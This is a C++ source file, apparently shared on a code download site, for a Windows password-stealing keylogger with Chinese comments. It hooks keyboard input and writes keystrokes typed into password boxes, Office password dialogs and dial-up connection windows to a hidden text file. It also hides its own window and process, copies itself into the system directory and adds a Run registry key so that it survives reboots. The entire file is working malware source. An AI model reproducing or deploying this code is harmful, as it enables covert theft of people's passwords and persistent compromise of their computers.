www.pudn.com > GetPwd.rar > GetPwd.cpp
#include#define KeyPMask 0x80000000 #define SERVICE_PROC 1 #define UNSERVICE_PROC 0 #define RUN "\\GmkMon.exe" typedef struct tagKEYDATA { char kKey; SHORT kShift; SHORT kCaps; SHORT kNum; BOOL bShift; BOOL bCaps; BOOL bNum; }KEYDATA, *LPKEYDATA; HHOOK hHook = NULL; DWORD (WINAPI *RegisterServiceProcess)(DWORD,DWORD); LRESULT CALLBACK WndProc (HWND, UINT, WPARAM, LPARAM) ; LRESULT CALLBACK JournalRecordProc(int nCode,WPARAM wParam,LPARAM lParam); /* * 函数功能: * 该API函数完成装载一个DLL库,并注册当前的DLL服务进程。 * 返回值: * 若注册成功则返回TRUE,否则返回FALSE。 */ BOOL WINAPI HideProc(int mode) { HINSTANCE DLLInst=LoadLibrary("KERNEL32.DLL"); if(DLLInst) { RegisterServiceProcess=(DWORD(WINAPI *)(DWORD,DWORD)) GetProcAddress(DLLInst,"RegisterServiceProcess"); if(RegisterServiceProcess) { RegisterServiceProcess(GetCurrentProcessId(),mode); return TRUE; } else return FALSE; } else return FALSE; } /* * 函数功能: * 该API函数用于判断密钥所在文件的类型,然后采用不同的算法进行截获,但首先必须获取文件的当前窗口的事件句柄。 */ BOOL WINAPI IsPassWindow() { HWND hWnd,curHwnd; TCHAR szTemp[MAX_PATH]; DWORD dwsTyle; curHwnd=GetActiveWindow(); if(curHwnd==NULL) return FALSE; while(curHwnd!=NULL) { hWnd=curHwnd; curHwnd=GetParent(hWnd); } dwsTyle=GetWindowLong(hWnd,GWL_STYLE); if(dwsTyle & ES_PASSWORD) //普通密码框 return TRUE; else if(!lstrcmp(szTemp,"EDTBX")) //Excel密码 return TRUE; else if(!lstrcmp(szTemp,"RichEdit20W") && (dwsTyle & WS_SYSMENU)) //WORD密码 return TRUE; GetWindowText(hWnd, szTemp, sizeof(szTemp)); if(!strncmp(szTemp, "连接到", 6)) //拨号网络 return TRUE; return FALSE; } /* * 函数功能: * 该API函数实现密钥的截获。 */ TCHAR WINAPI GetKey(int nKey) { KEYDATA kd; kd.kShift=GetKeyState(VK_SHIFT); kd.kCaps=GetKeyState(0x14); kd.kNum=GetKeyState(0x90); kd.bShift=(kd.kShift & KeyPMask)==KeyPMask; kd.bCaps=(kd.kCaps & 1)==1; kd.bNum=(kd.kNum & 1)==1; if(nKey>=48 && nKey<=57) // 0-9 { if(!kd.bShift) return (kd.kKey=nKey); else return '*'; } else if(nKey>=65 && nKey<=90) // a-z { if(!kd.bCaps) { if(kd.bShift) kd.kKey=nKey; else kd.kKey=nKey+32; } else if(kd.bShift) kd.kKey=nKey+32; else kd.kKey=nKey; return kd.kKey; } else if(nKey>=96 && nKey<=105) // 小键盘0-9 { if(kd.bNum) return (kd.kKey=(nKey-96+48)); else return '*'; } else if(nKey>=186 && nKey<=222) // 其他键 { switch(nKey) { case 186: if(!kd.bShift) kd.kKey=';'; else kd.kKey=':'; break; case 187: if(!kd.bShift) kd.kKey='='; else kd.kKey='+'; break; case 188: if(!kd.bShift) kd.kKey=','; else kd.kKey='<' ; break; case 189: if(!kd.bShift) kd.kKey='-'; else kd.kKey='_'; break; case 190: if(!kd.bShift) kd.kKey='.'; else kd.kKey='>'; break; case 191: if(!kd.bShift) kd.kKey='/'; else kd.kKey='?'; break; case 192: if(!kd.bShift) kd.kKey='`'; else kd.kKey='~' ; break; case 219: if(!kd.bShift) kd.kKey='['; else kd.kKey='{'; break; case 220: if(!kd.bShift) kd.kKey='\\'; else kd.kKey='|'; break; case 221: if(!kd.bShift) kd.kKey=']'; else kd.kKey='}'; break; case 222: if(!kd.bShift) kd.kKey='\\'; else kd.kKey='\\'; break; default: kd.kKey='n'; break; } if(kd.kKey!='n') return kd.kKey; else return '*'; } else return '*'; } /* * 函数功能: * 修改所要截获密钥的目标文件,即将文件中的密钥从文件中移除或修改。 */ void WINAPI WritePassFile(int nKey) { HANDLE hFile; DWORD dwBytesWrite=1; TCHAR lpStr; hFile=CreateFile("C:\\passdata.txt", GENERIC_READ|GENERIC_WRITE, FILE_SHARE_WRITE, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_HIDDEN, NULL ); SetFilePointer(hFile,0,NULL,FILE_END); lpStr=GetKey(LOBYTE(nKey)); WriteFile(hFile,&lpStr,1,&dwBytesWrite,0); CloseHandle(hFile); } /* * 函数功能: * 安装Windows Hook程序。 */ void WINAPI InstallHook(HINSTANCE hInstance) { if(hHook==NULL) hHook=SetWindowsHookEx(WH_JOURNALRECORD,(HOOKPROC)JournalRecordProc,hInstance,0); } /* * 函数功能: * 卸载当前的Windows Hook程序。 */ void WINAPI UninstallHook() { if(hHook!=NULL) UnhookWindowsHookEx(hHook); } /* * 函数功能: * 回调日志中记录的进程程序,返回下一所要安装的Windows Hook程序的句柄。 */ LRESULT CALLBACK JournalRecordProc(int nCode,WPARAM wParam,LPARAM lParam) { EVENTMSG *pMess=(EVENTMSG *)lParam; POINT pt; switch(pMess->message) { case WM_KEYDOWN: if(IsPassWindow()) WritePassFile(LOBYTE(pMess->paramL)); break; case WM_LBUTTONDBLCLK: GetCursorPos(&pt); break; } return CallNextHookEx(hHook,nCode,wParam,lParam); } /* * 函数功能: * Windows主窗口函数,它完成对其它进程的调用、Windows Hook的控制等。 * 这是Windows应用的进程程序。 */ int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, PSTR szCmdLine, int iCmdShow) { HANDLE hMutex=CreateMutex(NULL,FALSE,"GMKRunOnlyOne"); if(hMutex==NULL||ERROR_ALREADY_EXISTS==GetLastError()) ExitProcess(1); static char szAppName[] = "Get Password" ; HWND hwnd ; MSG msg ; WNDCLASSEX wndclass ; HKEY hKey=0; DWORD disp=0; LONG lResult; TCHAR szKey[MAX_PATH]; TCHAR szSysDir[MAX_PATH+25]; TCHAR szFileName[MAX_PATH]; wndclass.cbSize = sizeof (wndclass) ; wndclass.style = CS_HREDRAW | CS_VREDRAW ; wndclass.lpfnWndProc = WndProc ; wndclass.cbClsExtra = 0 ; wndclass.cbWndExtra = 0 ; wndclass.hInstance = hInstance ; wndclass.hIcon = LoadIcon (NULL, IDI_APPLICATION) ; wndclass.hCursor = LoadCursor (NULL, IDC_ARROW) ; wndclass.hbrBackground = (HBRUSH) GetStockObject (WHITE_BRUSH) ; wndclass.lpszMenuName = NULL ; wndclass.lpszClassName = szAppName ; wndclass.hIconSm = LoadIcon (NULL, IDI_APPLICATION) ; RegisterClassEx(&wndclass); hwnd=CreateWindow( szAppName, "Get Password", WS_OVERLAPPEDWINDOW, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, NULL, NULL, hInstance, NULL ); ShowWindow(hwnd,SW_HIDE); UpdateWindow(hwnd); HideProc(SERVICE_PROC); InstallHook(hInstance); GetSystemDirectory(szSysDir,MAX_PATH); lstrcat(szSysDir,RUN); GetModuleFileName(NULL,szFileName,MAX_PATH); CopyFile(szFileName,szSysDir,FALSE); lstrcpy(szKey,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"); lResult=RegCreateKeyEx( HKEY_LOCAL_MACHINE, szKey, 0, NULL, REG_OPTION_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, &disp ); if(lResult==ERROR_SUCCESS) { lResult=RegSetValueEx(hKey,"GmkMon",0,REG_SZ,(const unsigned char*)szSysDir,lstrlen(szSysDir)); RegCloseKey(hKey); } while (GetMessage (&msg, NULL, 0, 0)) { TranslateMessage (&msg) ; DispatchMessage (&msg) ; } return msg.wParam ; } /* * 函数功能: * 回调Windows进程程序。 */ LRESULT CALLBACK WndProc (HWND hwnd, UINT iMsg, WPARAM wParam, LPARAM lParam) { switch (iMsg) { case WM_PAINT: return 0 ; case WM_DESTROY: UninstallHook(); PostQuitMessage (0) ; return 0 ; } return DefWindowProc(hwnd,iMsg,wParam,lParam); }